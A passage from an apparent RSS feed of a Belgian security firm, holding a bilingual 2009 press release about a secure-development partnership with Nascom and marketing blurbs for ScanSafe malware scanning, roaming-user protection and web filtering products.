<p style="margin-left:20px;margin-right:20px;margin-bottom:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom neemt voortaan diensten van ZION SECURITY mee op in haar aanbod. Zo zitten een risico-analyse en een uitgebreide testronde in het totaalpakket dat de klant aankoopt. Optioneel kan de klant kiezen voor consultancy op maat en het nieuwe &lsquo;ZION VERIFIED&rsquo;, een oplossing die de applicatie na ontwikkeling blijft beschermen tegen externe bedreigingen.</p>
</td>
<td width="254" valign="middle">
<p style="padding:0;margin:0;text-align:right;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-knowledge-invest-nl.gif" width="225" height="55" alt="Veilige applicaties, altijd en overal" style="margin:0 20px 0 0;padding:0;border:0;"/></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Investeren in kennis is essentieel om dit gemeenschappelijke doel waar te maken. Nascom medewerkers werden door de specialisten van ZION SECURITY grondig opgeleid om de juiste know-how en expertise te garanderen.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Als eerste ontwikkelaar van online toepassingen in Belgi&euml; implementeert Nascom een &lsquo;Secure Development Life cycle&rsquo; (SDL), en integreert ze veiligheidsgerelateerde kennis en effort in haar standaard SDL. Dat betekent onder meer dat ZION SECURITY, bij iedere applicatie die dit vereist, standaard een code review en testing uitvoert.</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Valkuilen omzeilen</h4>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">ZION SECURITY beveelt op haar beurt Nascom aan als strategische partner voor &lsquo;secure web development&rsquo; bij haar klanten. Ze hebben vertrouwen in het niveau van Nascom en weten dat hun manier van programmeren en de implementatie van de SDL veilige applicaties garandeert.</p>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">Dankzij deze aanpak worden typische valkuilen op gebied van security vermeden, want er wordt vanaf de start van het project al op gefocust. De klant kan dus op een veilige applicatie rekenen aan het eind van het productieproces.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:20px;margin-right:0;margin-bottom:15px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/meer-info.gif" width="64" height="10" alt="meer info" style="border:0"/></p>
<h3>Nascom</h3>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Jonas Coenen (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:jonas.coenen@nascom.be" title="mail to jonas.coenen@nascom.be">jonas.coenen@nascom.be</a>)<br /> t: +32 89 20 15 00<br /> f: +32 89 20 15 01</p>
<h4>ZION SECURITY</h4>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Christophe Joos (Sales &amp; Account Manager) (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:christophe.joos@zionsecurity.com" title="mail to christophe.joos@zionsecurity.com">christophe.joos@zionsecurity.com</a>)<br /> m: +32 495/83 51 31<br /> t: +32 16/29 79 22</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Wie is Nascom?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom is een jong en dynamisch agency dat zich profileert in de interactieve sector op 4 vlakken: Digital Campaigns, Digital Applications, Mobile en Services. Meer dan 70 enthousiaste creatievelingen geven er elke dag het beste van zichzelf.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:20px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Meer weten over Nascom? Kijk op <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.nascom.be" title="Wie is Nascom">www.nascom.be</a></p>
<h4>Wie is ZION SECURITY?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Het Leuvense ZION SECURITY werd in 2005 opgericht door Ir. Erwin Geirnaert en Jessica Nieuwdorp. De medewerkers zijn experts in IT en beveiliging met jarenlange ervaring in projecten voor grote, middelgrote en kleine ondernemingen. Ze zijn gespecialiseerd in het beveiligen van business en e-business applicaties, e-commerce shops en netwerkinfrastructuur.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Meer weten over ZION SECURITY? Kijk op <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.zionsecurity.com" title="Wie is ZION SECURITY">www.zionsecurity.com</a>.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin:10px 0 10px 20px;"><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="#top" title="Top">Top</a></p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:25px;margin-left:20px;margin-bottom:5px;color:#5a5b5b;font-size:11px;font-family:Arial"><a name="frans"></a>fran&ccedil;ais</p>
</td>
</tr>
<tr>
<td valign="top" style="margin-top:5px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-title-fr.gif" width="516" height="64" alt="Nascom et ZION SECURITY mettent partenariat unique en marche" style="border:0;padding:0;margin:0 0 0 20px;"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="margin: 0pt; padding: 25px 0px 35px 20px; width: 236px; height: 310px;">
<h1>Hasselt / Louvain 17 septembre 2009</h1>
<p style="margin-bottom:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin-bottom:25px;"><strong>Un d&eacute;veloppeur d&rsquo;applications en ligne et un expert de solutions de s&eacute;curit&eacute; mettent en route un partenariat unique pour pouvoir offrir un service complet aux clients.</strong></p>
<img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-intro-en.gif" width="169" height="54" alt="Better safe than sorry" style="padding:0;border:0;margin-left:25px"/>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Quand il s&rsquo;agit d&rsquo;applications (web), les probl&egrave;mes de s&eacute;curit&eacute; ne sont typiquement adress&eacute;s qu&rsquo;au moment o&ugrave; un &lsquo;hack&rsquo; a &eacute;t&eacute; d&eacute;termin&eacute; et un probl&egrave;me urgent se pr&eacute;sente. Dans le meilleur des cas, une application est test&eacute;e sur des risques de s&eacute;curit&eacute; apr&egrave;s la livraison.</p>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom et ZION SECURITY pr&eacute;f&egrave;rent adopter une attitude proactive. Ils introduisent la s&eacute;curit&eacute; au d&eacute;part du projet, et peuvent ainsi &eacute;viter beaucoup de frais et de probl&egrave;mes &eacute;ventuels.</p>
</td>
<td valign="top" style="margin: 0pt; padding: 0pt; width: 294px; text-align: right;"><br /> <img src="http://www.nascom.be/nascommailing/zion/img/zion_nascom.gif" width="252" height="310" alt="Nascom et ZION SECURITY mettent partenariat unique en marche" style="border:0;padding:0;margin:0;margin-top:63px"/> <br /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<h4>Partenariat parfait</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Le point de d&eacute;part de ce partenariat est de veiller sur la s&eacute;curit&eacute; de chaque application. Nascom s&rsquo;occupe du d&eacute;veloppement des applications et laisse la question de la s&eacute;curit&eacute; dans les mains comp&eacute;tentes d&rsquo;un partenaire tiers et ind&eacute;pendant. En ZION SECURITY, elle a trouv&eacute; le partenaire id&eacute;al.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY reste associ&eacute; de tr&egrave;s pr&egrave;s au projet pendant le proc&egrave;s entier et s&rsquo;occupe des probl&egrave;mes de s&eacute;curit&eacute;. Cela a pour r&eacute;sultat que le client puisse compter sur une application sans risque au moment de la livraison.</p>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; border-collapse: collapse; margin-bottom: 15px;">
<tbody>
<tr>
<td width="296" valign="top">
<h4>Investir dans les connaissances</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom offrira d&eacute;sormais des services de ZION SECURITY dans son offre initial au client, comme une analyse des risques et un testing profond.  Le client a l&rsquo;option d&rsquo;obtenir une expertise sur mesure ainsi que le nouveau service &lsquo;ZION VERIFIED&rsquo;, une solution qui aide &agrave; prot&eacute;ger l&rsquo;application contre des menaces ext&eacute;rieures apr&egrave;s le d&eacute;veloppement.</p>
</td>
<td width="254" valign="middle">
<p style="padding:0;margin:0;text-align:right;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-knowledge-invest-fr.gif" width="225" height="68" alt="Veiller sur la s&eacute;curit&eacute; de chaque application" style="margin:0 20px 0 0;padding:0;border:0;"/></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Investir dans les connaissances est essentiel. Les employ&eacute;s de Nascom ont re&ccedil;u une formation approfondie des sp&eacute;cialistes chez ZION SECURITY afin de pouvoir garantir un savoir-faire correct.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom est le premier d&eacute;veloppeur d&rsquo;applications en ligne en Belgique &agrave; impl&eacute;menter un &lsquo;Secure Development Life cycle&rsquo; (SDL). ZION SECURITY va toujours ex&eacute;cuter un code review et du testing, sur chaque application qui en a besoin.</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>&eacute;viter les pi&egrave;ges</h4>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">ZION SECURITY recommandera Nascom comme partenaire strat&eacute;gique pour le &lsquo;secure web development&rsquo; aupr&egrave;s de ses clients. Ils ont confiance au niveau d&rsquo;expertise chez Nascom et savent qu&rsquo;avec leur fa&ccedil;on de programmer et l&rsquo;impl&eacute;mentation du SDL la s&eacute;curit&eacute; des applications est garantie.</p>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">Gr&acirc;ce &agrave; cette nouvelle approche, les pi&egrave;ges typiques en ce qui concerne des probl&egrave;mes de s&eacute;curit&eacute; peuvent &ecirc;tre &eacute;vit&eacute;s.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:20px;margin-right:0;margin-bottom:15px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/plus-info.gif" width="111" height="10" alt="Pour plus d'info:" style="border:0"/></p>
<h3>Nascom</h3>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Jonas Coenen (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:jonas.coenen@nascom.be" title="mail to jonas.coenen@nascom.be">jonas.coenen@nascom.be</a>)<br /> t: +32 89 20 15 00<br /> f: +32 89 20 15 01</p>
<h4>ZION SECURITY</h4>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Christophe Joos (Sales &amp; Account Manager) (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:christophe.joos@zionsecurity.com" title="mail to christophe.joos@zionsecurity.com">christophe.joos@zionsecurity.com</a>)<br /> m: +32 495/83 51 31<br /> t: +32 16/29 79 22</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Qui est Nascom?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom est une entreprise digitale avec une &eacute;quipe dynamique, passionn&eacute;e, sp&eacute;cialis&eacute;e en 4 disciplines interactives: les Campagnes Digitales, les Applications Digitales, le secteur Mobile et des Services. Nascom emploie plus de 70 personnes cr&eacute;atives.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:20px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">En savoir plus? Visitez <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.nascom.be" title="Visitez www.nascom.be">www.nascom.be</a></p>
<h4>Qui est ZION SECURITY?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY &agrave; Louvain, a &eacute;t&eacute; fond&eacute; en 2005 par Ir. Erwin Geirnaert et Jessica Nieuwdorp. Ses consultants sont des experts en IT et en s&eacute;curit&eacute; qui ont beaucoup d&rsquo;exp&eacute;rience dans le secteur. Ils sont sp&eacute;cialis&eacute;s en la s&eacute;curit&eacute; des applications business et e-business, des boutiques e-commerce et &lsquo;network infrastructure&rsquo;.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">En savoir plus? Visitez <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.zionsecurity.com" title="Visitez www.zionsecurity.com">www.zionsecurity.com</a>.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin:10px 0 10px 20px;"><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="#top" title="Top">Top</a></p>
</td>
</tr>
<tr>
<td>
<table border="0" cellspacing="0" cellpadding="0" style="background: #111112 none repeat scroll 0% 0%; width: 550px; border-collapse: collapse;">
<tbody>
<tr>
<td valign="top" style="padding:0;margin:0;">
<p style="margin:0 0 15px 20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-contact.gif" width="74" height="15" alt="Contact HQ" style="border:0;"/></p>
<p style="margin: 0pt 0pt 0pt 20px; padding: 0pt; width: 135px; color: #555655; font-size: 12px; line-height: 16px; font-family: Arial;">Nascom Genk<br /> C-Mine 1 bus 13<br /> Evence Copp&eacute;elaan 91<br /> 3600 Genk<br /> Belgium (Map)</p>
</td>
<td valign="top" style="border-left:1px solid #686868;border-right:1px solid #686868;padding:0;margin:0;">
<p style="margin:0 0 15px 20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-contact-sales.gif" width="94" height="13" alt="Contact Sales" style="border:0;"/></p>
<p style="margin: 0pt 0pt 0pt 20px; padding: 0pt; width: 135px; color: #555655; font-size: 12px; line-height: 16px; font-family: Arial;">Nascom Diegem<br /> MC-SQUARE<br /> Lambroekstraat 5a<br /> 1831 Diegem<br /> Belgium (Map)</p>
</td>
<td valign="top" style="padding:0;margin:0;">
<p style="margin:0 0 15px 20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-what.gif" width="75" height="13" alt="What we do" style="border:0;"/></p>
<p style="margin: 0pt 0pt 0pt 20px; padding: 0pt; width: 140px; color: #555655; font-size: 12px; line-height: 16px; font-family: Arial;">Rich media applications<br /> Campaigns<br /> Social media<br /> Mobile</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="bottom" style="background: #111112 none repeat scroll 0% 0%; height: 53px;">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; height: 34px; border-collapse: collapse;">
<tbody>
<tr>
<td valign="bottom" style="padding:0;margin:0;"><a href="mailto:info@nascom.be" title="e-mail us"><img src="http://www.nascom.be/nascommailing/zion/img/mail-email.gif" width="56" height="34" alt="e-mail us" style="border:none;"/></a></td>
<td valign="top" style="padding:0;margin:0;">
<p style="padding:0;margin:3px 0 0;color:#5a5b5b;font-size:11px;font-family:Arial;">Phone +32 89 20 15 00</p>
</td>
<td valign="top" style="padding:0;margin:0;">
<p style="padding:0;margin:3px 0 0;color:#5a5b5b;font-size:11px;font-family:Arial;">Fax +32 89 20 15 01</p>
</td>
<td valign="top" style="padding:0;margin:0;">
<p style="padding:0;margin:3px 0 0;color:#5a5b5b;font-size:11px;font-family:Arial;">VAT 479.316.194</p>
</td>
<td valign="bottom" style="padding:0;margin:0;text-align:right;"><a href="http://www.youtube.com/user/nascomhq" title="Nascom HQ"><img src="http://www.nascom.be/nascommailing/zion/img/mail-youtube.gif" width="88" height="34" alt="Nascom HQ" style="border:none;"/></a></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
</tr>
</tbody>
</table>]]></content:encoded></item><item><title>Nascom &amp; ZION SECURITY start up unique partnership</title><link>http://www.zionsecurity.com/news/nascom--zion-security-start-up-unique-partnership.aspx</link><pubDate>2009-09-29T15:44:11</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/nascom--zion-security-start-up-unique-partnership.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Whitepaper: Analysis of an unknown malicious JavaScript</title><link>http://www.zionsecurity.com/news/whitepaper-analysis-of-an-unknown-malicious-javascript.aspx</link><pubDate>2009-09-28T09:29:33</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/whitepaper-analysis-of-an-unknown-malicious-javascript.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Web Malware scanning</title><link>http://www.zionsecurity.com/solutions/web-security/web-malware-scanning.aspx</link><pubDate>2009-09-22T10:40:36</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-security/web-malware-scanning.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_175x53.jpg"  width="175"  height="53" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Malware Scanning</span></p>
<p class="contenttext">Web browsing has become the favorite target of malicious code writers seeking to compromise your network. The number of browser vulnerabilities continues to rise, fuelling zero-hour exploits which can infect systems before patches or signatures are available.</p>
<p class="contenttext">The threat is moving from the inbox to the browser with increasing focus on gaining financial advantage. This is most evident in the recent rise of spyware which comes in a wide variety of forms, from programs that steal confidential information to nuisance adware.</p>
<p class="contenttext">By the time most administrators realize they have a problem, the damage is already done, and they are left with the high cost of remediation, lost productivity, and unnecessary network traffic and system instabilities.</p>
<p class="contenttext">Increasing browser vulnerabilities, zero-hour threats, and the insertion of malicious code on legitimate sites have made real-time malware scanning essential (simply filtering by URL leaves a large security gap).</p>
<p class="contenttext">Scansafe's Web Malware Scanning service eliminates all types of harmful Web malware, including spyware, viruses and zero-hour threats before they can enter and infect your network.</p>
<p class="contenttext">This service delivers true layered defense through a combination of multiple best-in-class signature scan engines, multiple reputation and behavior analysis engines, automated machine-learning heuristics, and the industry's largest Web data set.</p>
<p class="contenttext">All Web requests are scanned in real-time, rather than solely relying on static URL lists, providing you with dynamic, real-time, and multi-layered protection.</p>
<p class="contenttext">Anti-malware scan engines will protect your network from threats that have been previously identified and documented. But what if your network is one of the first to be attacked?</p>
<p class="contenttext">Signature-based scanning alone will not provide the protection you need. Scansafe has developed Outbreak Intelligence, a proprietary security platform which analyzes URL reputation, traffic behaviour, code behaviour and code reputation in addition to signatures to detect unknown as well as known malware. Once it has detected unknown malware, Outbreak Intelligence automatically propagates the protection to the scanning layer, where the threat is neutralized before it can reach your network.</p>
<p class="contenttext"><a href="/protected/Web Malware.pdf">Download</a> the PDF about ScanSafe Web Malware scanning for more information.</p>
<p class="contenttext">Please <a href="/contact.aspx">consult</a> one of our representatives for more information or a quote.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_175x53.jpg"  width="175"  height="53" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Malware Scanning</span></p>
<p class="contenttext">Web browsing has become the favorite target of malicious code writers seeking to compromise your network. The number of browser vulnerabilities continues to rise, fuelling zero-hour exploits which can infect systems before patches or signatures are available.</p>
<p class="contenttext">The threat is moving from the inbox to the browser with increasing focus on gaining financial advantage. This is most evident in the recent rise of spyware which comes in a wide variety of forms, from programs that steal confidential information to nuisance adware.</p>
<p class="contenttext">By the time most administrators realize they have a problem, the damage is already done, and they are left with the high cost of remediation, lost productivity, and unnecessary network traffic and system instabilities.</p>
<p class="contenttext">Increasing browser vulnerabilities, zero-hour threats, and the insertion of malicious code on legitimate sites have made real-time malware scanning essential (simply filtering by URL leaves a large security gap).</p>
<p class="contenttext">Scansafe's Web Malware Scanning service eliminates all types of harmful Web malware, including spyware, viruses and zero-hour threats before they can enter and infect your network.</p>
<p class="contenttext">This service delivers true layered defense through a combination of multiple best-in-class signature scan engines, multiple reputation and behavior analysis engines, automated machine-learning heuristics, and the industry's largest Web data set.</p>
<p class="contenttext">All Web requests are scanned in real-time, rather than solely relying on static URL lists, providing you with dynamic, real-time, and multi-layered protection.</p>
<p class="contenttext">Anti-malware scan engines will protect your network from threats that have been previously identified and documented. But what if your network is one of the first to be attacked?</p>
<p class="contenttext">Signature-based scanning alone will not provide the protection you need. Scansafe has developed Outbreak Intelligence, a proprietary security platform which analyzes URL reputation, traffic behaviour, code behaviour and code reputation in addition to signatures to detect unknown as well as known malware. Once it has detected unknown malware, Outbreak Intelligence automatically propagates the protection to the scanning layer, where the threat is neutralized before it can reach your network.</p>
<p class="contenttext"><a href="/protected/Web Malware.pdf">Download</a> the PDF about ScanSafe Web Malware scanning for more information.</p>
<p class="contenttext">Please <a href="/contact.aspx">consult</a> one of our representatives for more information or a quote.</p>]]></content:encoded></item><item><title>Anywhere Plus</title><link>http://www.zionsecurity.com/solutions/web-security/anywhere-plus.aspx</link><pubDate>2009-09-22T10:24:59</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-security/anywhere-plus.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Anywhere+<img src="/media/22252/logo_jpg_small_165x50.jpg"  width="165"  height="50" alt="Scansafe logo" style="float: right;"/></span></p>
<p class="contenttext">The number of employees who work outside the traditional office is rapidly increasing and perhaps surprisingly now constitutes the majority for many businesses.</p>
<p class="contenttext">Roaming employees now connect to the Internet from a variety of locations, from their homes and client offices to airport lounges and hotel hotspots. However, the benefits of employees working outside the office are tempered by some obvious problems, chief of which are lower levels of security and increased vulnerability to Web malware.</p>
<p class="contenttext">IT administrators have little or no control over roaming employees' access to inappropriate Web content. This situation is not helped by the fact that roaming employees are five times more likely to access inappropriate content on the road than in the office.</p>
<p class="contenttext">Even more worrying is that roaming employees only use VPNs 17% of their browsing time. How are they controlled and protected the other 83% of the time?</p>
<p class="contenttext">Anywhere+ is ScanSafe's SaaS Web Security for real-time protection and policy enforcement for your roaming employees. With Anywhere+ it is finally possible to protect your roaming employees wherever they are working.</p>
<p class="contenttext">Unlike traditional approaches which rely on software and appliances, Anywhere+ is delivered as a service for complete security, reduced complexity and simplified user management. Anywhere+ removes the performance issues and bandwidth congestion associated with backhauling Web traffic over the corporate VPN, so your security perimeter is now anywhere you want it to be.</p>
<p class="contenttext">All Web traffic flowing to ScanSafe's upstream datacenters is SSL encrypted leading to improved security over public networks. With Anywhere+, log information is securely in your hands, not on a file on the local PC. Reporting data is automatically and continuously aggregated across internal corporate users and roaming users.</p>
<p class="contenttext">Policy changes can be implemented immediately - no need to wait for client software to try to update itself on its own schedule. Policy changes are active within seconds, globally.</p>
<p class="contenttext">Anywhere+ is deployed through a lightweight driver (7MB) that requires minimal memory (less than 16MB RAM) to authenticate and direct your external client Web traffic to ScanSafe's scanning infrastructure.</p>
<p class="contenttext"><a href="/protected/Anywhere Plus.pdf">Download</a> the PDF about ScanSafe Anywhere+ for more information.</p>
<p class="contenttext">Please <a href="/contact.aspx">consult</a> one of our representatives for more information or a quote.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Anywhere+<img src="/media/22252/logo_jpg_small_165x50.jpg"  width="165"  height="50" alt="Scansafe logo" style="float: right;"/></span></p>
<p class="contenttext">The number of employees who work outside the traditional office is rapidly increasing and perhaps surprisingly now constitutes the majority for many businesses.</p>
<p class="contenttext">Roaming employees now connect to the Internet from a variety of locations, from their homes and client offices to airport lounges and hotel hotspots. However, the benefits of employees working outside the office are tempered by some obvious problems, chief of which are lower levels of security and increased vulnerability to Web malware.</p>
<p class="contenttext">IT administrators have little or no control over roaming employees' access to inappropriate Web content. This situation is not helped by the fact that roaming employees are five times more likely to access inappropriate content on the road than in the office.</p>
<p class="contenttext">Even more worrying is that roaming employees only use VPNs 17% of their browsing time. How are they controlled and protected the other 83% of the time?</p>
<p class="contenttext">Anywhere+ is ScanSafe's SaaS Web Security for real-time protection and policy enforcement for your roaming employees. With Anywhere+ it is finally possible to protect your roaming employees wherever they are working.</p>
<p class="contenttext">Unlike traditional approaches which rely on software and appliances, Anywhere+ is delivered as a service for complete security, reduced complexity and simplified user management. Anywhere+ removes the performance issues and bandwidth congestion associated with backhauling Web traffic over the corporate VPN, so your security perimeter is now anywhere you want it to be.</p>
<p class="contenttext">All Web traffic flowing to ScanSafe's upstream datacenters is SSL encrypted leading to improved security over public networks. With Anywhere+, log information is securely in your hands, not on a file on the local PC. Reporting data is automatically and continuously aggregated across internal corporate users and roaming users.</p>
<p class="contenttext">Policy changes can be implemented immediately - no need to wait for client software to try to update itself on its own schedule. Policy changes are active within seconds, globally.</p>
<p class="contenttext">Anywhere+ is deployed through a lightweight driver (7MB) that requires minimal memory (less than 16MB RAM) to authenticate and direct your external client Web traffic to ScanSafe's scanning infrastructure.</p>
<p class="contenttext"><a href="/protected/Anywhere Plus.pdf">Download</a> the PDF about ScanSafe Anywhere+ for more information.</p>
<p class="contenttext">Please <a href="/contact.aspx">consult</a> one of our representatives for more information or a quote.</p>]]></content:encoded></item><item><title>Web Filtering</title><link>http://www.zionsecurity.com/solutions/web-security/web-filtering.aspx</link><pubDate>2009-09-22T10:00:09</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-security/web-filtering.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_175x53.jpg"  width="175"  height="53" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Scansafe Web Filtering</span></p>
<p class="contenttext">As the amount of time spent browsing the Internet continues to rise, the problems associated with providing unmonitored and unregulated Internet access also increase.</p>
<p class="contenttext">Now dynamic and user generated content makes up a large percentage of content being accessed. Therefore traditional methods of filtering based purely on web site categorization can no longer be considered sufficient to maintain web usage policy and prevent inappropriate content from entering the network.</p>
<p class="contenttext">Scansafe Web Filtering empowers organisations of all sizes to implement an effective Web policy to help limit legal liability, enhance user productivity and improve network performance by preventing inappropriate, bandwidth intensive or non-business related content from entering the network.</p>
<p class="contenttext">Scansafe Web Filtering enables businesses to implement granular control for both inbound and outbound communications while realizing cost savings of up to 40% by eliminating the need to purchase, deploy and maintain hardware required for on-premise solutions.</p>
<p class="contenttext"><strong>With this solution you have complete control over how end users access content on the Internet by providing intuitive tools to create, enforce and monitor effective inbound and outbound web policy. For example it helps you to prevent leaks of confidential or personal data to the Web.</strong></p>
<p class="contenttext">Scansafe Web Filtering integrates seamlessly with existing Active Directory infrastructure, allowing administrators to easily create different access policies to suit different areas of the organization. You also have a web-based interface for centralized management and reporting.</p>
<p class="contenttext"><a href="/protected/Web Filtering.pdf">Download</a> the PDF about ScanSafe Web Filtering for more information.</p>
<p class="contenttext">Please <a href="/contact.aspx">consult</a> one of our representatives for more information or a quote.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_175x53.jpg"  width="175"  height="53" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Scansafe Web Filtering</span></p>
<p class="contenttext">As the amount of time spent browsing the Internet continues to rise, the problems associated with providing unmonitored and unregulated Internet access also increase.</p>
<p class="contenttext">Now dynamic and user generated content makes up a large percentage of content being accessed. Therefore traditional methods of filtering based purely on web site categorization can no longer be considered sufficient to maintain web usage policy and prevent inappropriate content from entering the network.</p>
<p class="contenttext">Scansafe Web Filtering empowers organisations of all sizes to implement an effective Web policy to help limit legal liability, enhance user productivity and improve network performance by preventing inappropriate, bandwidth intensive or non-business related content from entering the network.</p>
<p class="contenttext">Scansafe Web Filtering enables businesses to implement granular control for both inbound and outbound communications while realizing cost savings of up to 40% by eliminating the need to purchase, deploy and maintain hardware required for on-premise solutions.</p>
<p class="contenttext"><strong>With this solution you have complete control over how end users access content on the Internet by providing intuitive tools to create, enforce and monitor effective inbound and outbound web policy. For example it helps you to prevent leaks of confidential or personal data to the Web.</strong></p>
<p class="contenttext">Scansafe Web Filtering integrates seamlessly with existing Active Directory infrastructure, allowing administrators to easily create different access policies to suit different areas of the organization. You also have a web-based interface for centralized management and reporting.</p>
<p class="contenttext"><a href="/protected/Web Filtering.pdf">Download</a> the PDF about ScanSafe Web Filtering for more information.</p>
